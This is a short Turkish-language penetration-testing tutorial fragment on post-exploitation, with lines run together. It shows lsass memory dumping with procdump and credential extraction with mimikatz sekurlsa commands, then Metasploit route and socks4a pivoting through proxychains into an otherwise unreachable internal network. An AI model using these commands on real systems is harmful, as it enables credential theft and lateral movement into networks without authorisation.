xfreerdp /u:"user_name" /v:localhost:4444
komutu xfreerdp için kullanılabilir.privilege::debugsekurlsa::minidump <dump_file_name.DMP>sekurlsa::logonpasswords
procdump.exe -ma lsass.exe lsass.DMP
route add <dışarıdan erişilmeyen IP> <erişilmeyen blok için subnet> <meterpreter session id
route add 192.168.1.0 255.255.255.0 2
Tek bir ip adresine ait yönlendirme yapılacak ise aşağıdaki şekilde ifade edilebilir.
route add 192.168.1.42 255.255.255.255 2
use auxiliary/server/socks4aset RHOST <your ip>set RPORT <your port>run
proxychains
kullanılabilir. Bunun için /etc/proxychains.conf
dosyasının en altında socks4 IP PORT
bilgisi girilmelidir. Böylece proxychain ile başlatılan bütün uygulamaların trafiği belirtilen IP:PORT a yönlendirilecektir. Ordan da yazdığımız route kuralına göre dışardan erişemediğimiz networke iletilir.proxychains msfconsole -q
ile başlatılır. Artık metasploit'e ait tüm trafik proxychainde belirtilen IP:PORT' yönlendirilir ordan da hedef sistemin içinde olduğu network'e.